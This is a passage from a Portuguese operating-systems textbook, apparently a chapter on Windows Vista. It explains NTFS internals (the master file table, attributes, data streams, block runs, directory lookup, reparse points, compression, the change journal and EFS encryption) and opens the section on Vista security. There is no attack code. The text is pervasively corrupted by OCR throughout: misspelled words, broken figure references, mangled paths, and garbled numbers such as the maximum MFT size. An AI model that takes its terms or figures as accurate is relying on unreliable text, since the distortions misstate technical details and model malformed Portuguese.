comprcssao c a criptografia de arqtiivos. 

Estrutura do sistema de arquivos 

Gada volume do NTFS (por exemplo, a partięao do 
disco) contem arquivos, diretórios, mapas de bits e outras 
estruturas dc dados. Gada volume e organizado como uma 
seąuencia linear dc blocos fdusters', na terminologia da 
Microsoft), com o tamanho do bloco detenninado ]iara 
cada volimie e indo de 512 bytes a 64 KB, dependendo do 
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tamanho do volume. A maioria dos discos NTFS usa blocos 
de 4 KB como um tamanho que serve como ponto de equi- 
Ifbrio entre blocos grandes (para transferencias eficientes) 
e blocos peąucnos (para obter u ma baixa fragmentaęao in¬ 
terna). Os blocos sao releren dados por sens deslocamemos 
a partii do iiucio do volume, usando-se numeros de 64 bits. 

A principal estrutura de dados de cada volume e a 
MFT (masterfiktabk — tabela mestre de arquivos), que 
e urna sequenda llnear de registros com tamanho fixo de 
3 KB. Cada registro da MFT dcscreve somente um arquivo 
ou um diretório. 0 registro contem atributos do arquivo, 
como seu nonie e sua estampa de tempo e a lista de ende- 
reęos de disco onde sens blocos estao I ocali/.a dos. Se um ar- 
quivo for extremameme grandę, algumas vezes sera neces- 
sario usar dois ou mais registros da MFT para abrigar a lista 
de i od os os blocos. Nesse caso, o primeiro registro da MFT, 
chama do de registro-base, aponta para os outros regis¬ 
tros da MFT, Essc esquema nos remete de voha aos tempos 
do CP/M, no qual cada emrada de d iretorio era chama da 
de exten$ao, Um mapa de bits faz o acompanhamento de 
quais entradas da MFT estao livres. 

A MFT e, em si, um arquivo e, como tal, pode ser colo- 
cada em qualquer lugar de um volume, eliminando assim o 
probletm com setores defeituosos na primeira trilha. Alem 
disso, o arquivo pode crescer o quanto for preciso, ate um 
tamanho maximo de 2 4 * registros. 

A MFT e mostrada na Figura 11.24. Cada registro da 
MFT constiiui uma sequencia de pares (cabeęalho do atri¬ 
buto, valor). Cada atributo comeęa com um cabeęalho que 
indica quai e o atributo e o tamanho do valor, pois alguns 
yalores de atributos tern o tamanho variaveL como o nome 
do arquivo e os dados, Se o valor do atributo for sufidente¬ 
rn ente curto para caber em um registro da MFT, ele sera co- 


iocado la. Isso e cha ma do arquivo imediato (Mullender e 
Tanenbaum, 1984). Se for muito grandę, sera colocado em 
outro lugar do disco e um ponteiro para ele sera inserido 
no registro da MFT. Isso torna o NTFS bastante efi cierne 
para campos pequenos, ou seja, aqueles que se encaixam 
no próprio registro MFT. 

Os pdmekos 16 registros da MFT sao reservados para 
os arquivos dc metadados do NTFS, conforme ilustra a Figu¬ 
ra 1L24. Cada um dos registros descreve um arquivo nor¬ 
ma I que tern atributos c blocos dc dados, como qualquer 
outro arquivo, Cada um desses arquivos tern um nome que 
comeęa com um cifrao — para indicar que e um arquivo de 
metadados. O primeiro registro descreve o próprio arqutvo 
da MFT, Particularmente, ele indica onde os blocos da MFT 
estao, para que o sistema tenha condięoes de encontrado. 
Gbviameme, o Windows predsa de uma maneira de encon- 
trar o primeiro bloco do arquivo da MFT, para entao a char 
o restante da informaęao sobre o sistema de arquivos. Ele 
cncontra o primeiro bloco do arquivo da MFT a pariir da 
ueriflcaęao do bloco de inicializaęao, onde sen endereęo e 
instalado no memento de instalaęao do sistema. 

O registro 1 e uma cópia da primeira parte do arquivo 
da MFT. Essa informaęao e tao prcciosa que ter uma segunda 
cópia pode ser absolutamenie necessario, no caso de ocor- 
rerem defeitos nos primeiros blocos da MFF. O registro 2 
e o arquivo dc registro de eventos, Quando o eonem mu- 
danęas estnnnrais no sistema de arquivos — como adicionar 
um novo diretório ou reinover um diretório existente —, 
a aęao c registrada nesse arquivo antes dc ser reaiizada, a firn 
de aumentar a probabilidade de uma recu per aęao correta, 
na ocorrencia de unia falha durante a opcraęao, tal como 
uma parada de sistema. As mu danęas nos atributos de ar- 
quivostambem sao registradas nesse arquivo. Na vcrdade, as 
unicas mu danęas que nao sao registradas nesse arquivo sao 
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as que ocorrem nos dados do usuariG. O registro 3 contem 
informaęoćs sobre o volume, como sen la ma uh o, su o kkn- 
tificaęao e sua versao. 

Conformę mcndonado anteriormente, cada registro 
da MFT contem urna seąucncia tk pares (cabeęalho do 
atributo, valor). No arquivo $AHrDef e quc cstao dcfinidos 
os atributos, A informaęao sobre csse arquivo encontra-se 
no registro 4 da MFT, Dcpois vcm o dirctório-raiz, quc tam- 
bem e um arquivo e que pode crcscer para mn tamanho 
qualquer. Ele fi ca descrito no registro 5 da MFT. 

O espaęo Iivre do volume e comrolado por um mapa 
de bits, que tambem e um arquivo J e sens atributos e ende- 
reęos de disco tkam no registro 6 da MFT. O próximo regis¬ 
tro da MFT apoma para o arquivo de carga de inieiallzaęao. 
O registro 8 e usado para ligar todos os blocos dcfeiluosos 
e assegurar que eles nnnca farao parte de um arquivo. O 
registro 9 contem a informaęao sobre seguranęa. O regis¬ 
tro 10 e usado para o mapeamento de letras maiusculas e 
minusculas. Para as letras latinas, csse mapeamento de A 
aZe óbvlo (pelo menos para as pessoas que utilizam esse 
alfa beto). Para outros idiomas, como grego, armenio ou 
ge orgia no, isso e menos óbvio; assim, esse arquivo most r a 
como se faz csse mapeamento. Por firn, o registro I I e um 
diretório quc contem dwersos arquivos para coisas como 
cotasde disco, idemifleadores de objetos, pontos dc reana- 
tise e assim por dianie. Os ultinios ąuatro registros da MFT 
sao reservados para uso futuro. 

Cada registro da MFT consisLe em u ni cabeęalho do re¬ 
gistro, seguido por u ma sequencia de pares (cabeęalho do 
atributo, va!or). O cabeęalho do registro contem: um mi¬ 
mem magico usado para venficai sua validade, um nume- 
ro sequencial aiualizado a cada vez qtte o registro e reutili- 
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zado por um novo arquivo, um contador de referencias ao 
arquivo, o mi mero de bytes realnienie usados no registro, 
o identificador (mdice, niimero sequencial) do registro- 
-base (usado somente para registros de extensao) e alguns 
outros campos diversos. 

O NTFS define 13 atributos que podem aparecer nos 
registros da MFT. Esses atributos sao apresenlados na Tabe¬ 
la 11,18* Cada cabeęalho identifica o atributo e infamia o 
lamanho e a localizaęao do campo de valor junto com di- 
versas flags e oulras informaęóes. Em geral, os valores do 
atributo ficam logo após seus eabeęalhos, mas, se um valor 
for tao krngo que nao caiba no registro da MFT, ele podera 
ser eolocado em um bloco de disco sępa rado. Esse atributo e 
chama do de atributo nao residente, O atributo de dados 
e um candidato óbvio a ser nao residente. Alguns atributos, 
como os no mes, podem ser repet idos, mas todos os atributos 
devem aparecer em urna determinada orderu no registro da 
MFT, Os cabeęalhos de atributos residentes tern 24 bytes; os 
de atributos nao residentes sao maiores porąue contem in¬ 
formaęao sobre onde encontrar o atributo no disco. 

O campo de informaęao padrao contem o proprieta- 
rio do arquivo, informaęoes sobre seguranęa, estampas dc 
tempo exigidas pelo POSIX, contador de Liga ęoes restritas, 
bits que indicam que o arquivo ć somente leitura, bits de 
arqiiivamento etc. Esse e um campo de lamanho fixo e obri- 
gatório. O nonie do arquivo e um campo em Unicode e de 
lamanho variavel. Em seguida, para tornar os arquivos com 
nomes que nao sejam do lipo MS-DOS aoe$stveis aos pro- 
gramas antigos de \ 6 bits, os arquivos podem dispor de um 
nome curto MS-DOS 8 + 3. Se o nonie real do arquivo 
estiver de acordo com a regra MS-DOS 8 + 3, o nonie scculi¬ 
da rio MS-DOS nao sera utilizado. 


Atributo 

Descrręao 

Informaęao-padrao 

Bits de sinais, estampas de tempo etc. 

Nome do arquivo 

Nome do anquivo em Unicode; pode ser nepetido para nome MS-DOS 

Descrta de seguranęa 

Obsoleto. A informaęao de seguranęa agora fica em $Extend$Secure 

Lista de atributos 

Localizaęao dos registros adicionais da MFT, se necessarto 

ID do objęto 

Identificador de arquivos de 64 bits, unico para este volume 

Ponto de reanalise 

Usado para montagens e ligaęoes simbólicas 

Nome do volume 

Nome deste vdume (usado somente em SVdume) 

informaęao sobre o volume 

Versao do volume (usado somente em $Volume) 

(ndice-raiz 

Usado para diretórios 

Indice de alocaęao 

Usado para diretórios muito grandes 

Mapa de bits 

Usado para diretórios muito grandes 

Fluxo com utilidade de registro 

Controla registro de eventos no SLogFile 

Dados 

Fluxo de dados; pode ser repetido 


I Tabela 1 i.iB Os atributos usados nos registros da MFT. 
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No NT 4.0 # a informaęao sobie seguran^a podia ser co- 
locada eni um atributo, mas no Windows 2000 e nas ver- 
soes superiorem, essa informaęao fi ca em um unico arquivo, 
para que varios arquivos possani compartilhar as mesmas 
descrięoes dc seguranęa. Isso resuiia em urna economia sig- 
nificativa dc espaęo na maioria das gravaęoes da MFT e no 
sistema dc arquivo$ inteiro, pois as informaęóes de segu- 
ranęa para muitos dos arquivos de propriedade dc usuarios 
diferemes sao identicas. 

A lisia de atribulos e neccssaiia para o caso de os atri- 
butos na o ca berem no registro da MFT. Esse atributo indica 
onde encomrar os registros de cxtensao. Ca da enirada da 
lista contcm um mdicc de 48 bits, na MFC indica ndo onde 
o registro de extensao esta e um numero seąuendal dc 16 
bits para conferir sc o registro dc extensao e os registrom- 
-base sao iguais, 

Os arqtuvos do NTFS possuem um ID associado que 
e semelhante ao nu ni ero do i-node no UNIX, Os arquivos 
podem serabertos pelo ID, mas os IDsatribufdospelo NTFS 
nem sempre sao liteis quando o ID deve persistir porque 
cle e baseado no registro MTF e pode ser alterado se o re¬ 
gistro para o arquivo mudar (por cxemp]o, se o arquivo for 
restaurado a partir de um backup). O NTFS permite um 
atributo de identificaęao dc objęto separado que pode ser 
coniigtirado em um arquivo c uunca prccisa ser alterado. 
Ele pode ser mantido com o arquivo caso dc seja copiado 
para um novo volume, por exemp!o. 

O ponto de reanalise diz ao procedirnento de analise o 
nome do arquivo para fazer algo especial. Esse mecanismo 
e uiilizado para montagem de sistema de arquivos e liga- 
ęóes simbólicas. Os dois atributos de voJumc sao usados 
somerue para idemifieaęao do vokime. Os próximos ires 
atribulos lidani com o modo como os diretórios sao im- 
plementados. Os pequenos sao apenas listas de arquivos, 
mas os grand es sao implementados usando-se arvorcs B+. 
O atributo de registro de fluxo de uUltdadc e empregado 
pelo sistema de criptografia de arqinvos. 

Por fim, chegamos ao atributo pelo qual indos espe- 
ramos: os fluxos de dados (ou fiuxos, em alguns casos). 
Um arquivo NTFS possui um ou mais fluxos de dados a 
cle associado e e af quc mora o perigo, O fluxo de da¬ 
dos pa dra o nao e nomeado (por exemplo, amimhodiA 
notnearquivo::$DATA), mas ca da fluxo alternativo de 
dados possui um nome como, por exempIo f camlnhodiA 
mm c a rq u ivo:nomefluxo$DATA < 

Para cada fiuxo, o seu nome, sc homer, lica no cabeęa- 
Iho desse atributo. Em seguida ao cabeęalho esia urna lista 
de endereęos de disco jndicando quais blocos o fiuxo con¬ 
iem ou o próprio 1111 X 0 , para fluxos dc semenie algumas 
cerUenas de bytes (c ha muitos dcl es)* Quando o fluxo de 
dados rcal fica no registro da MFT, usa-se o termo arquivo 
imedtato (Mullender e Tanenbaum, 1984). 

Ć claro que, na maioria das vczes, os dados nao cabem 
no registro da MFT; portanto, o norma] e que esse airibu- 
lo seja nao residenic. Agora, vcjamos como o NTFS fica 


sabendo da localizaęao dos atribulos nao residentes — em 
dados particulares. 

Alocaęao de armazenamento 

Por razócs de cficićncia, monitoram-se os blocos dc 
disco dispondo-os cm scrics dc blocos consccutivos, quan- 
do possivcl Por cxcmplo, sc o primciro bloco lógico de 
um fhixo estiver no bloco 20 do disco, emao o sistema 
tentara alocar o segundo bloco lógico no bloco 21, o ter- 
cciro no bloco 22 c assim por dianie. Urna mandra de 
fazer isso consiste em alocar varios blocos de urna vez só, 
ąuando possweh 

Os blocos cm um arquivo sao dcscritos por unia sc- 
quencia de registros, e cada um descrcve u ma sequcncia de 
blocos logicos co migu os. Para um fluxo sem espaęos vazios, 
havcra sommte um desses registros. Os f i uxos cscritos na 
ord cm, do inicio a te o firn, pcrtenccm a cssa categoria. Um 
fluxo com um espaęo vazio (porexemplo, apenas os blocos 
de 0-49 e os blocos de 60-79 sao definidos) tera dois re¬ 
gistros. Esse fluxo poderia ser pro duzi do escrevendo-se os 
primciros 50 blocos e depois buscando a frento pelo bloco 
lógico 60 c, emao, escrcvendo os oulros 20 blocos, Quando 
um espaęo vazio e lido, todos os bytes que nao existem 
sao zeros. Um arquivo com um espaęo vazio e chamado de 
arquivo esparso. 

Cada registro cotrteęa com um cabeęalho inforniando 
o dcslocamcmo do primciro bloco dentro do fluxo. Depois 
vcm o dcslocamento do primeiro bloco ndo cobcrto pelo 
regisiro. No exemplo anierior, o primeiro regislro teria um 
cabeęalho de (0, 50) e forneceria os endereęos de disco para 
esses 50 blocos. O segundo teria um cabeęalho de (60, 80) e 
forneceria os endereęos de disco para esses 20 blocos. 

Cada cabeęalho de registro e seguido por um ou mais 
pares, cada um indica ndo um endereęo dc disco c urn la- 
manho. O endereęo de disco ć o dcslocamento do bloco de 
disco desek o inicio de sua partięao; o la manho ć o numero 
de blocos na serie, No registro podem estar quanios pares 
forem necessarios. O uso desse esquema para um arquivo 
de nove blocos e ires sCries e i lustra do na Figura 11,25, 

Nessa figura temos urn registro da MFT para um pe- 
queno arquivo. Ele consiste em tres scrics de blocos con- 
sccutivos dc disco. A primeira serie e formada pelos blocos 
20 a 23, a segunda e constitufda pelos blocos 64 c 65 e a 
terceira consiste nos blocos 80 a 82. Cada urna dessas senes 
6 gravada no registro da MFT como um par (endereęo de 
disco, contador dc bloco). O numero de series depende do 
desempenho do alocador de blocos de disco em encomrar 
series de blocos consecutivos quando o arquivo e criado. 
Para um fiuxo de n blocos, o numero de series pode ser 
qualquer coisa entre 1 e n. 

Cotwem fazer varios comentarios aqui. Primeiro, nao 
ha um limitc maximo para o tamanho dos fluxos quc podem 
ser representados dessa maneira. Sem compressao, cada par 
reąuer dois valores de 64 bits no pap para um total de 16 
bytes. Contudo, um par poderia represemar u ni milliao ou 
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I Figura 11.25 Um registro da MFT para um arquivo de tres series e nove bfocos, 


rnais blocos consecuiivos de disco. Na verdade, urn arquivo 
de 20 MB r formado por 20 series de um milhao de blocos de 
I KB cada, cabe facilmeme em um registro de MFT, O mes- 
mo nao ocorre com um arquivo de 60 KB espalhados por 60 
blocos separados, 

Em segundo lugar, enąuanto o modo direto de re- 
presenlar cada par octipa 2x8 byles, ha um metodo dc 
compressao dispomvd para reduzir o tamanho dos pares 
a men os de 16 bytes, Muitos endereęos de disco tein va- 
rios byies zero nos bytes de ordem rnais alra. Esses zeros 
podem ser omitidos. O cabeęałho de da dos indica quantos 
ddes esiao om iii dos, isto e, quantos bytes sao realnienie 
usados por endereęo, Outros tipos de compressao tambem 
sao empregados. Na pratica, miii ta s vezes os pares tern 
apenas 4 bytes, 

Nosso primeiro excmplo foi ta dl: toda a Lnformaęao 
do arquivo cabe em um registro da MFT. O que acontece 
quando o arquivo e tao grandę ou tao [rag me ma do que a 
informaęao do bloco nao cabe no registro da MFT? A res- 
posta e simples: usam-se dois ou mais registros da MFT. Na 
Figura 11,26 wmos um arquivo cujo rcgistro-basc csni no 
registro 102 da MFT, Ele tern senes demais para um regis¬ 
tro da MFT; desse modo, ca lcu la-sc dc quantos registros dc 
exlensao ele precisa — por exemplo, dois — e inserem-se 
scus fndices no registro-base, O restante do registro 6 usado 
pelas primeiras £scries dc da dos. 

Observe que a Figura 11.26 apresenta alguma redlin- 
dantia, Teoricameme, nao seria necessario especificar o finał 


de uma sequenda de sćrics, pois essa informaęao pode ser 
calcnlada a partir dos pares dasseries. O motivo para reforęar 
essa informaęao ć a busca por maisefidenda: para encontrar 
o bloco em uma delerminada posięao, e nęcessario apenas 
verificar os cabeęallios do registro, nao os pares cle senes. 

Quando todo o espaęo no registro 102 estiver ocupa- 
do, o annazenamemo da serie prosseguira no regisiro 105 
da MFT. Sao coiocadas nesse registro lamas sćries quamas 
couberem. Quando esse registro tambem estiver dieio, o 
restante das series irl para o regisiro 108 da MFT, Desse 
modo, diversos registros da MFT podem ser usados para 
tratar arquivos muito fragmentados. 

Surge um problema ąuando sao nccessarios tani os regis¬ 
tros da MFT que nao ha espaęo na base da MFT para rclado- 
nar todos os seus fndices. Mas ha uma soluęao para esse pró¬ 
bie ma: a lista de registros de extensao da MFT Loma-se nao 
residente (isio e, armazenada no disco, e nao no registro-base 
da MFT). Desse modo, ele pode crcscer o quamo precisar. 

Uma entrada da MFT para um diretório peąueno e iluś- 
trada pela Figura 11.27. O registro contem varias entradas 
dc diretório; cada uma ddas descreve um arquivo ou um di¬ 
retório. Cada entrada tem uma estrutura de tamanho fixo, 
seguida por um nonie de arquivo, de tamanho variavel. A 
parte fka contcm o indicc da entrada da MFT do arquivo, o 
tamanho do nonie doarquivo c diversos outros campos c sr- 
nalizadores. Buscar por uma entrada em um diretório con- 
siste em verificar todos os no mes de arquivo, um por vez. 
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I Figura 11.26 Um arquivo que requer tres registros MFT para armazenar todas as suas serie®. 
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Cabeęalho da 
Informaęao-padreio 

Cabeęalho 
do registro 


Cabeęalho do 
indice da ratz 

\ \ 


informaęao- 

-padrao 


U ma entrada do diretório contóm o indice da MFT para 

/ o arquivo, o tamaaho do nome do arquivo, o praprio 
nome do arquivo e varios campos e bits sinaiizadores 



I Figura 11.27 O registno da MFT para um pegueno diretório. 


Grandes diretórios u sam um formato diferente. Em vez 
de urna lisia linear de arquivos, e empregada urna arvore B+ 
para fazer urna possivel busca em ordem alfabetica e fadlitar 
a inseręao de novos nom es no diretório, no lugar apropriado. 

Agora temos infonnaęao sufi cienie para cmender 
como a busca por no mes de arquivos fundona para um ar- 
quivo \?7\C:\foe\kar< Ma Figura 1 L I 1, vimos como o Win32, 
o sistema de cha mad as naiivas do NT e os gcrenciadores de 
E/S e de objetos trabalham em conjunto na abertura de um 
arquivo por meio do envio de uma solidtaęao de E/S para 
a pilha de dispositivos do NTFS para o volume Essa soli- 
titaęao pede ao NTFS para preencher um objęto de arquivo 
para o restante do nome do diretório, \fooMmr. 

A analise do caminho do diretório ybćA/w prosseguc 
agora no diretório-raiz de C, cujos blocos pode ni ser en- 
contrados na entrada 5 da MFT (veja a Figura 11.24), A 
busca da cadcia 'foo no diretório-rai z, rciorna o indice do 
diretório foo na MFT. Eotao ocorre a busca da cadcia 'haf, 
quc se refere ao regisiro MTF para esse arquivo. O NTFS 
executa veriflcaędes de acesso voltando ao monitor de re¬ 
ferenda de segunmęa c, se Ludo der certo, elc procura pelo 
aiributo ::$DATA, que e o fluxo de dados pa dra o. 

Se a busca pelo arquivo bar for bem-sucedida, o NTFS 
configura pomciros para scus próprios metadados no ob¬ 
jęto de arąuWo, iransmitidos a partit do gerenciador de 
E/S. Os meta dados in.cluem um po n lei r o para o registro do 
MTF, informaęóes sobie compressao e bloqueios de sequen- 
cia, varios delalhes sobie compartilhamento etc. A maior 
parte desses dados esia em eslruturas de dados comparii- 
Ihadas emre todos os objeios referent es ao arquivo. Poucos 
campos sao espccificos somente para o arquivo atualmente 
a berto, tal como o que dolinę se o arquivo deve ser exdindo 
quando fcchado. Uma vcz que a abertura ten ha sido bem- 
-sucedida, o NTFS chama loConnpleteRequest para passar o 
(RP de vo!ia da pilha de E/S para os gcrenciadores de E/S 
e de objetos. Em ultima iosiantia, urn manipulador para o 
objęto dc arquivo c inserido na tabela de snanipuladores do 
processo correrue, e o centrale e dcvolvido ao modo usua- 
rio. Nas charnadas ReadFtle subsequentcs, o descritor pode 
ser forneddo por urna aplicaęao, espedficando que o obję¬ 
to de arqutvo para C:\foo\btir devc ser indu ido na solidtaęao 
dc Idtura trammitida da pi Ilia de disposiiivos para o NTFS. 

Alem dc arquivos e diretórios comuns, o NTFS supor- 
la ligaęoes estritas similarcs as do UNIX e tambórn ligaęoes 
simbóiicas usando um mecanismo chama do de pontos de 


reanalise. No NTFS, e possivel ratular um arquivo ou um 
diretório como um ponto de reanalise e assotiar um bloco de 
dados a ele. Quando o arquivo ou o diretório for encontrado 
durante a analise de seu nome, a operaęao falha e o bloco 
de dados e devolvido ao gerenciador de objetos. Este pode 
imerpretar os dados como representaęao de um caminho 
altemativo e, em seguida, atualizar a cadcia de caraderes 
para imerpretar e ten tar nova menie a operaęao de E/S. Esse 
mecanismo serve para su porta r tanio as ligaędes simbóiicas 
quanto os sistemas de arquivos por montagem, rediredo- 
nando a busca para uma parte diferente da hierarquia de 
diretórios ou ate mesmo para uma partięao diferente. 

Os pontos de reanalise tarnbem sao utilizados para eti- 
ąuetar arquivos individuais para drivers de Filiro do sistema 
de arquivos. Na Figura 11.11, moslramos como os lillros 
podem ser instalados entre o gerenciador de E/S e o siste¬ 
ma de arquivos. As solicitaęoes de E/S sao condufdas eom 
a chamada loGompleteReguest que passa o controle para as 
roli nas de conclusao de ca da driver representado na pilha 
de dispo$itivos Inserido no IRP quando a solidtaęao esia- 
va sendo feita. Um driver que queira etiquetar um arquivo 
associa uma etiqueta de reanalise e monitora as rot i nas de 
conclusao para operaęoes de abertura de arquivo que falha- 
ram porque encontraram um ponto de reanalise. A partir 
do bloco de dados devolvido com o IRP, o driver consegue 
distingiiir se esse e um bloco de dados que o próprio driver 
assodou ao arquivo. Caso seja. o driver ira parar de proces- 
sar a conclusao e continuara a processar a solidtaęao de E/S 
odginał Geralmente, isto ira envolver o initio da solicilaęao 
de abertura, mas existe um sinalizador que informa ao NTFS 
para ignorar o ponto de reanalise e abiir o arquivo. 

Compressao de arquivos 

O NTFS su porta a compressao transparente de arqui- 
vos. Um arquivo pode serenado cm modo comprimido, o 
que significa qtie o NTFS tenta comprimir automaticamen- 
tc os blocos quando cles sao escritos c dcscomprimi-los au- 
tomaticamente quando sao lidos. Os processos que leem ou 
cscrcvem arquivos comprimidos nem ficam sabendo que 
esia havendo compressao e descompressao, 

A compressao funciona da seguime maneira: ąuando 
o NTFS escreve, no disco, um arquivo marca do para com¬ 
pressao, ele verifica os primeiros 16 blocos (lógicos) do ar- 
quivo, sem se preocupar com quantas senes des ocupam. 
Entao, ele executa um algoritmo de compressao nesses blo¬ 
cos. Se os dados resultantes puderem ser armazenados em 
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15 blocos ou menos, os dados comprimidos serao escritos 
no disco, preferencja Imen te cm u ma serie, se possfvd, Sc os 
dados comprimidos ainda oenparem 16 blocos, os 16 blocos 
sao escritos na forma descomprimida, Depois, os blocos 16 
a 31 serao verificados para saber se des podem ser compri¬ 
midos para 15 blocos ou menos, e assim poi dianie, 

A Figura 1 L28(a) mostra urn arquivo no qual os pri- 
meiros 16 blocos foram comprimidos para oito blocos, 
os 16 blocos seguimes faiharam na compressao e os lilii- 
mos 16 blocos foram comprimidos cm 50 por ccmo. As trćs 
partes foram cscritas como tres senes e armazenadas no 
registro da MFT, Os blocos 'quc fal lam" sao armazenados 
na entrada da MFT com o endereęo dc disco 0, eonforme 
mostra a Figura )L2S(b). Nesse caso, o cabeęalho (0, 48) 
e seguido por cinco pares, dois para a primeira serie (coni- 
primida), u.m para a serie descomprimida e dois para a serie 
finał (comprimida). 

Quando o arquivo e lido, o NTFS deve saber quais se¬ 
nes esiao comprimklas e quais nao estao. Ele fi ca sabendo 
disso pclos endcrcęos de disco, Um endereęo de disco 0 in- 
dica que e a parte finał dos 16 blocos comprimidos. Para 
cviiar airibiguidade, o bloco de disco 0 nao pode ser usado 
para armazenar dados. De qualquer maneira, como dc con- 
tem o setor de inicializaęao, e impossivd usado para dados. 

O accsso aleatório aos arquivos comprimidos c possf- 
vtd, mas complicado. Suponha quc um processo busquc 
pelo bloco 35 na Figura 1 L28, Como o NTF5 localiza o 
bloco 35 cm um arquivo comprimklo? A resposta e; cle 
primeiro te e descomprime loda a serie. Em seguida, de 
busca saber ondc o bloco 35 esia e cmao encaminha o blo¬ 
co para algom processo que possa le-lo. A escolha de 16 
blocos como unidade de compressao foi um compromisso. 
Tornado menor deixaria a compressao menos efieaz. Tor¬ 
nado maior lornaria o accsso aleatório rnais cusioso. 
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Uso de diario 

O NTFS su porta dois mecanismos para que programas 
deiectem mudanęas em arquivos e diretórios em um vo- 
In me, O primeiro dcles e urna opcraęao de E/S chama da 
MtlMotifyChangeDiriectoiyFile, que passa um buffer ao sistema 
que, por .su a vez, ret orna quando u ma mudanęa em um 
diretório ou subdiretório e detectada. O resultado da E/S e 
que o buffer foi preenchido com uma lisia de registms mo- 
difitados. Com sonę, o buffer sera grandę o su fi cienie ou os 
registros que nao couberem serao perdidos. 

O segundo mecanismo e o diario de modificaęoes do 
NTFS. Este manieni uma Usta de todas as alieraęoes de re¬ 
gistros para diretórios c arquivos no voUime em um arqui- 
vo especial, clij os programas podem l er utiliza ndo opera- 
ęoes especiais de controle do sistema de arquivos, ou seja, 
a opęao FSCTL_QUERY_USN_JOURNAL da APl NtFsControl- 
File, O arquivo de diario normalnienie e muito grandę e ha 
poucas chanccs de as emradas serem reuiilizadas antes de 
serem examinadas. 

Criptografia de arquivQ5 

Os compuiadores sao usados, atualmeme, para arma- 
zenar todo lipo de dados sensfads, emre os quais pi a nos de 
incorpomęóes, informaęao sobre iributos c ca nas de amor — 
en firn, mformaęóes cujos donos nao as querem ver reyda- 
das a ąualąuer um. O roubo de informaęao pode ocorrer 
quando um computador portatil e perdido ou roubado, 
quaiuio um computador dc mesa e reinicializado por um 
disco flemel MS-DOS, para desviar-se da seguranęa do 
Windows, ou ąuando um disco rigido e fisicamente remo- 
vido dc um computador e instalado em outro com um sis- 
tema opera cional inseguro, 

O Windows resolvc esses problemas disponibilizando 
uma opęao para criplogra far arquivos; desse modo, mesmo 
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I Figura 11,28 (a) Um exemplo de arqLJivo com 43 blocos sendo comprimido para 32 blocos, (b) O registro da MFT para o arquivo, 
depois da compressao. 
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ąnaiido o comptuador e roubado ou rei ni da liza do usando 
o MS-DOS, os arquivos serao Llegfveis. O modo normal de 
tisara criptografia no Windows e marcando certos direlórios 
como criptografados, o qne faz com que lodos os seus arqui- 
vos sejam criptografados; a leni disso, novos arquivos movi- 
dos ou criados nesses direlórios lambem sao cripiografados. 
Os processos de criptografar e decripiar em si nao sao feitos 
pelo NTFS propriamente, mas por urn driver ehamado EFS 
{mayptioji file system — sistema de criptografia de arqui- 
vos), que regisira cha mad as de retorno com o NTFS. 

O EFS oferccc codificaęao para arquivos e direlórios 
cspccificos* Existe ainda outra facilidadc de codiikaęao no 
V.ista, cha mada BitLocker, que codiFica quase todos os da- 
dos de um volume e que pode ajudar a pro leg er os dados 
independeiitemente de qualquer ocorrencia — desde que 
o usuario aproveite o mecanismo dispomvd para chaves 
fortes. Dado o nu mero de sistemas perdidos ou roubados 
a todo i usianie e a grandę sensibilidade ao pi obiema de 
roubo de identidadc, e muito importanle garantir que os 
segrcdos estejam bem guardados. Um mi mero surpreen- 
dente de notebooks e pcrdido diariamente. As principais 
cmpresas de Wall Strccl estimam quc, semanaimcnte, pelo 
mcnos um dc seus notebook c esąuecido cm um taxi da 
cidadc dc Nova York. 


11.9 


Seguranęa no Windows Vlsta 


Ja que falamos sobre o sistema de criptografia de ar- 
quivos, e uma boa oportunidadc para estudar a seguranęa 
cm geral. Originalmente, o NT foi projetado para cumprir 
as detcrminaęoes de seguranęa C2 do Departamento de 
Defesa dos Estados Unidos (DoD 5200.28-STD) — o Livro 
Lara n ja, que os sistemas DoD seguros devem seguir. Esse 
padrao exige que os sistemas operacionais tenham certas 
propriedades para serem classificados como seguros o sto 
ficiente para certos tipos de atividades militares. Embora o 
Windows Vista nao tenha sido especificamente projetado 
para o ciimprimento das detemiinaęoes C2, ele herda va- 
rias das propriedades de seguranęa do NT. Entre elas, esiao: 

1. Auienticaęao segura coin medidas contra irapaęas 
{spooling). 

2. Controles de acesso discricionario. 

3. Controles de acesso privilegiado. 

4. Proteęao do espaęo de endereęamento por processo. 

5. Novas paginas devem ser zeradas antes de serem 
mapeadas, 

ó. Auditoria de seguranęa, 

Reviscmos esses itens resumidamenie. 

Acesso seguro ao sistema signifka que o ad ministra ■ 
dor do sistema pode exigir que todos os usuarios tenham 
uma senha para se eon e eta rem, Trapaęas (spoofing) ocor- 
rem quando um usuario mal-intendonado escreve um 
p rog ra ma que m ostra a janela ou a tela-padrao de acesso 
ao sistema (login) e en ta o se afasta do compulador na es¬ 
peranta de que algum usuario ingenuo se sente e enlre 


com seu nome e sua senha. O nonie e a senha sao, eniao, 
escrilos no disco c ao usuario ć di to quc o acesso Ealhou. O 
Windows Vista impede esse tipo de ataque instruindo os 
usuarios para que pressionem as teclas CTRL-ALT-DEL 
para se coneetarem. Essa seguenria de teclas e sempre 
capturada pelo driver do te da do, que, por sua vez, invoca 
um programa do sistema que niostra a verdaddra tela dc 
acesso, Esse protedimento fund ona porque nao ha como o 
processo do usuario desabilitar o processamento dc CTRL- 
ALT DEL no drivcr do tedado. Mas o NT desabilita o uso 
da seguencia de atenęao segura CTRL-ALT-DEL em alguns 
ca sos. Essa ideia vem do Windows X? c do Windows 2000, 
que fazia o niesmo para ter maior compalibilidade para 
usuarios vindos do Windows 98, 

Os controles dc accssos discricionarios permitem ao 
dono de um arquivo ou de outro objęto dizer qucm pode 
usa-lo e dc que modo. Os controles de acessos privilegiados 
permitem quc o admimstrador do sistema (supemsudrio) 
ignorc os controles dc acessos discricionarios ąuando ne- 
cessario. A proteęao do espaęo dc cndercęamemo significa, 
simplesmente, que ca da processo tern sen própiio espaęo de 
endercęamento virtuai e quc nao pode sofrer acessos por 
qualquer processo quc nao esteja autorizadoa isso, O próxi- 
mo iłem significa que, quando urna pi Ilia cresce, as paginas 
mapeadas nela sao, antes, zeradas; desse modo, os processos 
naopodem cncomrar nenhuma iuformaęaoantiga colocada 
la pelo proprietarioanterior daguela pagina (daiopropósito 
das iisias de paginas zeradas, da Figura 11.20, que forneccm 
as paginas zeradas justamente por isso). For firn, a auditoria 
de seguranęa perm ile ao admimstrador produzir um regis- 
iro de certos evemos rclacionados com a seguranęa. 

Embora o Livro Laranja nao especifique o que deve 
acoiitcccr quando algucrn rotiba um notebook, nao c in- 
comum que se tenha um roubo por ścinana nas grand es 
